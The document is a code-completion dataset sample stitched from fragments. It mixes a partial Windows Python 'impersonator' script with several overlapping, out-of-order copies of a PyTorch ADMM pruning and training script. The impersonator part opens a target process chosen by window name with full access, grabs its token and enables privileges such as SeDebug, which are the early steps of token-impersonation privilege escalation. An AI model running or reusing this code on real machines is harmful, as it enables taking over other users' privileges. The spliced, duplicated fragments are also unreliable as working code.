print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebug | TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE | | random_line_split |
09_impersonator.py |
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
|
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebug | _fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
] | identifier_body |
main.py | prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho)) | train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model) | random_line_split | |
main.py | parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def | masked_retrain | identifier_name | |
main.py | """====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def masked_retrain(initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
| if name in masks:
W.grad *= masks[name] | conditional_block | |
main.py | ():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
